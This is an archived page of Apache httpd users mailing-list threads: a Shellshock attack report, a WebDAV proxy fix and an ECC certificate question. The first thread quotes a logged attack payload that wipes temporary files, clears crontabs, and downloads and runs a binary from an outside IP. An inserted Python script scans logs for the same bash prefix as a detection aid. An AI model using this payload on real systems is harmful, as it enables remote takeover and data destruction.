[users@httpd] Security question

2015-07-03 Thread Bremser, Kurt (AMOS Austria GmbH)
So you have CGI enabled on the document root?

Kurt Bremser
AMOS Austria

Newton was wrong. There is no gravity. The Earth sucks.

From: Victor Sterpu [vic...@casnt.ro]
Sent: Friday, 3 July 2015 08:16
To: users@httpd.apache.org
Subject: **SPAM?** Re: [users@httpd] Security question [wd-vc]

"sc.gif" was executed.

On 03.07.2015 09:05, Bremser, Kurt (AMOS Austria GmbH) wrote:
I guess that the 200 comes from the fact that apache simply delivered the 
/index.html page.
Or did you find that "sc.gif" was transferred and executed?

Kurt Bremser
AMOS Austria

Newton was wrong. There is no gravity. The Earth sucks.

From: Victor Sterpu [vic...@casnt.ro]
Sent: Thursday, 2 July 2015 14:29
To: users@httpd.apache.org
Subject: **SPAM?** Re: [users@httpd] Security question [wd-vc]

In the end the attack was successful. The log shows the last command:
62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 "-" "() 
{ :;};/usr/bin/perl -e 'print \"Content-Type: 
text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf 
/tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab -r ; 
killall -9 wget fetch curl lwp-download b f r xx y i.gif print start pscan 
pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O 
http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"

But I don't know how he launched this script.
How can I prevent this?
I was hoping the server would execute only local scripts, is there something I 
can do to allow only local scripts to be executed?


On 02.07.2015 15:13, Yehuda Katz wrote:

It is an attempt to exploit a specific configuration. By the fact that apache 
returned a 404 (the log line says so), you can see that attempt was not 
successful.

- Y

Sent from a gizmo with a very small keyboard and hyperactive autocorrect.

On Jul 2, 2015 8:00 AM, "Victor Sterpu" <vic...@casnt.ro> wrote:
Hello

A hacker attacked an apache2 web server by HTTP injection.
The log shows what he has done:
62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper 
HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: 
text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf 
/tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab -r ; 
killall -9 wget fetch curl lwp-download b f r xx y i.gif print start pscan 
pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O 
http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"

How can I prevent this in the future and how can I reproduce?
I tried to reproduce but it is not clear how he launched this command and I want 
to know so I can test my vulnerabilities in the future.
The path "/phppath/cgi_wrapper" doesn't exist at all.

Thank you

-
To unsubscribe, e-mail: 
users-unsubscr...@httpd.apache.org
For additional commands, e-mail: 
users-h...@httpd.apache.org



AMOS Austria GmbH
1130 Wien, Hietzinger Kai 101-105
FN 365014k, Handelsgericht Wien
UID: ATU 66614737

http://www.allianz.at


This e-mail and any attachments to it contain information
that is confidential and intended exclusively for the
named addressee(s).
If you are not the named addressee, you may neither make
this e-mail and any attachments accessible to other
persons nor use them in any other way.
If you are not the intended recipient, we ask you to
delete this e-mail and all attachments.

Please note: This email and any files transmitted with it is
intended only for the named recipients and may contain
confidential and/or privileged information. If you are not the
intended recipient, please do not read, copy, use or disclose
the contents of this communication to others and notify the
sender immediately. Then please delete the email and any
copies of it. Thank you.
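
For triage of access logs like the ones quoted in this thread, the following is an added example (not part of any message above): it parses Apache combined-format lines and flags requests whose request line, Referer or User-Agent contains the bash function-definition prefix "() {" seen in the quoted User-Agent, keeping the status code next to each hit. The sample lines, their IP addresses and the echo payload are constructed.

```python
import re

# Quoted log fields may contain backslash-escaped quotes (\"), as in the thread.
Q = r'(?:[^"\\]|\\.)*'
LINE_RE = re.compile(
    rf'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    rf'"(?P<request>{Q})" (?P<status>\d{{3}}) (?P<size>\S+) '
    rf'"(?P<referer>{Q})" "(?P<agent>{Q})"'
)
# "()" followed by "{", with optional whitespace: a bash function definition.
FUNC_DEF = re.compile(r'\(\s*\)\s*\{')
FIELDS = ("request", "referer", "agent")

def scan(lines):
    """Return one record per log line carrying the prefix in a client-set field."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        tainted = [f for f in FIELDS if FUNC_DEF.search(m[f])]
        if tainted:
            hits.append({"line": n, "ip": m["ip"], "time": m["time"],
                         "request": m["request"], "status": int(m["status"]),
                         "fields": tainted})
    return hits

def by_source(hits):
    """Group hits per client as (path, status) pairs for review."""
    out = {}
    for h in hits:
        parts = h["request"].split()
        path = parts[1] if len(parts) > 1 else h["request"]
        out.setdefault(h["ip"], []).append((path, h["status"]))
    return out

# Constructed sample lines (documentation IP ranges, harmless payload).
SAMPLE = [
    '192.0.2.10 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 "-" "() { :;}; echo \\"constructed\\""',
    '192.0.2.10 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() { :;}; echo constructed"',
    '198.51.100.7 - - [01/Jul/2015:17:03:00 +0300] "GET /index.html HTTP/1.1" 200 885 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [01/Jul/2015:17:03:09 +0300] "GET /a HTTP/1.1" 200 12 "() { x; }" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, seen in by_source(scan(SAMPLE)).items():
        print(ip, seen)
```

The status shown for each hit is what httpd answered for that URL; a 200 on a flagged request is a reason to check whether that URL maps to a CGI handler, not proof either way.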



Re: [users@httpd] WebDAV reverse proxy SLOW

2015-07-03 Thread Marat Khalili
Problems solved, under Windows 8 you need to listen to localhost IPv6 
address as well.


--

With Best Regards,
Marat Khalili


On 01/07/15 13:51, Marat Khalili wrote:

Dear all,

I'm configuring a reverse proxy with configuration provided below, for 
Apache 2.4 for Windows (I'm trying to bypass Windows authentication 
dialogs this way). It works, but file browsing is very slow: listing 
three files in a folder takes several seconds, dir /b/s comes line 
after line, and doesn't improve. In contrast, same WebDAV resource 
connected directly or via NetDrive utility is quite responsive. I 
suspect Apache does not reuse connections or similar problems, but 
can't find more parameters to tune. Please advise.



--

With Best Regards,
Marat Khalili


httpd.conf:

Define SRVROOT "/Apache24"
ServerRoot "${SRVROOT}"

Listen 127.0.0.1:80

LoadModule authz_core_module modules/mod_authz_core.so
LoadModule headers_module /Apache24/modules/mod_headers.so
LoadModule proxy_http_module /Apache24/modules/mod_proxy_http.so
LoadModule proxy_module /Apache24/modules/mod_proxy.so
LoadModule socache_shmcb_module modules/mod_socache_shmcb.so
LoadModule ssl_module modules/mod_ssl.so

ServerAdmin i...@rqc.ru
ServerName localhost


AllowOverride none
Require all denied


ErrorLog "logs/error.log"

LogLevel warn

SSLSessionCache "shmcb:${SRVROOT}/logs/ssl_scache(512000)"
SSLSessionCacheTimeout  300


SSLProxyEngine On
SSLProxyProtocol All -SSLv2 -SSLv3
SSLProxyVerify require
SSLProxyCACertificateFile /Apache24/conf/ssl/ca.crt
SSLProxyCheckPeerCN on
SSLProxyCheckPeerExpire on

# this is required to ensure that HTTP headers sent to the
# WebDAV server are "rewritten" from "http://..." to "https://..."
RequestHeader edit Destination ^http: https: early
RequestHeader set Authorization "Basic DEADBEEFDEADBEEFDEADBEEF"

# the essential proxy part

ProxyPass https://myserver.rqc.ru/ max=8 flushpackets=on keepalive=on connectiontimeout=300 timeout=300

ProxyPassReverse /
# some WebDAV clients (such as ordinary browsers) are unhappy with the
# cookies sent out by the internal server, so we "rewrite" the host and
# the used path to the correct, external representation
ProxyPassReverseCookieDomain myserver.rqc.ru localhost
ProxyPassReverseCookiePath /myserver.rqc.ru/ /








[users@httpd] Apache and Elliptic Curve Cryptography (ECC) Certificates

2015-07-03 Thread fabio . schmidt
Hi, 

I need to deploy an environment with Apache and mod_ssl and an Elliptic Curve 
Cryptography (ECC) certificate needs to be used. 

Does Apache support this type of certificate? 

Kind regards. 

Sincerely, 
Fabio S. Schmidt 
Senior Technical Consultant 
4linux - Open Software Specialists 
http://www.4linux.com.br 



Re: [users@httpd] Apache and Elliptic Curve Cryptography (ECC) Certificates

2015-07-03 Thread Eric Covener
On Fri, Jul 3, 2015 at 1:13 PM,   wrote:
> Hi,
>
> I need to deploy an environment with Apache and mod_ssl and an Elliptic Curve
> Cryptography (ECC) certificate needs to be used.
>
> Does Apache support this type of certificate?

Yes. The manual for mod_ssl has a number of ECC references.
>
> Kind regards.
>
> Sincerely,
> Fabio S. Schmidt
> Senior Technical Consultant
> 4linux - Open Software Specialists
> http://www.4linux.com.br
>



-- 
Eric Covener
cove...@gmail.com
